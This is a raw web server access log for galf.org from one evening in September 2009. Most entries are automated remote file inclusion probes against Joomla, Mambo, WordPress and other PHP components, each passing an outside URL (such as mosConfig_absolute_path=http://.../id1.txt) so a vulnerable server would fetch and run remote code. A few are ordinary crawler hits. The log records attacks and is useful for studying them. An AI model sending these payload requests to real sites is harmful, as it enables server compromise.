218.38.136.251 - - [06/Sep/2009:18:19:17 -0700] "GET /logs/access_090406.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:18:21:06 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:18:21:21 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:18:24:23 -0700] "GET /logs/access_090629.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:18:24:23 -0700] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [06/Sep/2009:18:24:27 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:18:35:35 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:18:35:35 -0700] "GET /logs/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:18:35:35 -0700] "GET /?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
65.182.186.172 - - [06/Sep/2009:18:36:20 -0700] "GET /logs/access_090525.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.61.244.6 - - [06/Sep/2009:18:36:49 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.61.244.6 - - [06/Sep/2009:18:36:49 -0700] "GET /?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.61.244.6 - - [06/Sep/2009:18:36:57 -0700] "GET /logs/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.61.244.6 - - [06/Sep/2009:18:38:10 -0700] "GET /logs/access_090525.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
211.234.100.46 - - [06/Sep/2009:18:38:11 -0700] "GET /?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.234.100.46 - - [06/Sep/2009:18:38:11 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.234.100.46 - - [06/Sep/2009:18:38:11 -0700] "GET /logs/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
82.194.85.198 - - [06/Sep/2009:18:38:41 -0700] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
211.234.100.46 - - [06/Sep/2009:18:40:10 -0700] "GET /logs/access_090525.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.234.100.46 - - [06/Sep/2009:18:47:49 -0700] "GET /logs/access_090803.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.234.100.46 - - [06/Sep/2009:18:48:12 -0700] "GET /logs/access_090831.log/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:18:48:45 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:18:48:45 -0700] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:18:48:45 -0700] "GET /?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.91 - - [06/Sep/2009:18:48:47 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.189.2.39 - - [06/Sep/2009:18:53:27 -0700] "GET /logs/access_090413.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.189.2.39 - - [06/Sep/2009:18:53:27 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.189.2.39 - - [06/Sep/2009:18:53:27 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.193 - - [06/Sep/2009:18:53:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.193 - - [06/Sep/2009:18:53:48 -0700] "GET /logs/access_090112.log HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:18:54:39 -0700] "GET /logs/access_090413.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:18:54:39 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:18:54:39 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.181.61.232 - - [06/Sep/2009:18:57:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:19:00:43 -0700] "GET /components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:19:00:43 -0700] "GET /logs//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:19:00:44 -0700] "GET /logs/access_090316.log%20%20//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:19:00:45 -0700] "GET /logs//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:19:00:45 -0700] "GET /components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:19:00:46 -0700] "GET /logs/access_090316.log%20%20//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.128.135.52 - - [06/Sep/2009:19:02:44 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.237.150 - - [06/Sep/2009:19:04:43 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:19:10:44 -0700] "GET /logs/access.log%20/modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "galf.org"
63.249.95.132 - - [06/Sep/2009:19:10:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "galf.org"
63.249.95.132 - - [06/Sep/2009:19:10:44 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "galf.org"
74.6.22.91 - - [06/Sep/2009:19:12:38 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:19:24:06 -0700] "GET /logs/access_090209.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:19:24:06 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:19:24:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:19:24:11 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:19:24:11 -0700] "GET /logs/access_090209.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:19:24:11 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:25:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:25:49 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:25:50 -0700] "GET /logs/access_090302.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:25:51 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:19:30:09 -0700] "GET /?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:19:30:09 -0700] "GET /logs/?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:19:30:09 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [06/Sep/2009:19:30:21 -0700] "GET /logs/access_090302.log%20%20/?sourcedir=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:19:37:27 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [06/Sep/2009:19:37:29 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [06/Sep/2009:19:37:29 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [06/Sep/2009:19:45:54 -0700] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.202.66 - - [06/Sep/2009:19:50:20 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:19:50:20 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:50:22 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:50:22 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:19:50:22 -0700] "GET /logs/access_090302.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.162 - - [06/Sep/2009:19:54:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.162 - - [06/Sep/2009:19:56:02 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1761648 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:19:57:37 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
211.43.202.66 - - [06/Sep/2009:19:57:37 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
91.194.10.126 - - [06/Sep/2009:19:58:19 -0700] "GET /logs/access_090413.log%20%20//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.194.10.126 - - [06/Sep/2009:19:58:19 -0700] "GET /include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.194.10.126 - - [06/Sep/2009:19:58:19 -0700] "GET /logs//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:19:58:36 -0700] "GET /logs/access_090427.log%20/modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
91.194.10.126 - - [06/Sep/2009:19:58:46 -0700] "GET /logs/access_090406.log%20%20//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.194.10.126 - - [06/Sep/2009:19:59:03 -0700] "GET /logs/access_090413.log//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.194.10.126 - - [06/Sep/2009:19:59:18 -0700] "GET /logs/access_090406.log//include.php?language=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.66.90.48 - - [06/Sep/2009:20:06:14 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?hl=es&q=index+of&start=50&sa=N" "Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13" "www.galf.org"
190.66.90.48 - - [06/Sep/2009:20:06:15 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13" "www.galf.org"
190.66.90.48 - - [06/Sep/2009:20:06:18 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:20:06:28 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [06/Sep/2009:20:06:28 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:20:07:17 -0700] "GET /logs/access_090302.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.13.185.108 - - [06/Sep/2009:20:07:17 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.137.163.133 - - [06/Sep/2009:20:07:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "www.galf.org"
78.137.163.133 - - [06/Sep/2009:20:08:04 -0700] "GET /logs/access_090223.log HTTP/1.1" 200 10131901 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:52 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:52 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:53 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:53 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:20:13:56 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
63.249.95.132 - - [06/Sep/2009:20:24:11 -0700] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:20:24:11 -0700] "GET /logs/access_090720.log%20/includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:20:24:11 -0700] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:20:24:14 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.144.100 - - [06/Sep/2009:20:25:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
110.45.144.100 - - [06/Sep/2009:20:25:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:27:40 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:27:40 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:27:40 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:28:18 -0700] "GET /logs/access_090223.log/e404.php?DOCUMENT_ROOT=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:28:21 -0700] "GET /e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:28:21 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:28:21 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [06/Sep/2009:20:28:57 -0700] "GET /logs/access_090223.log/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
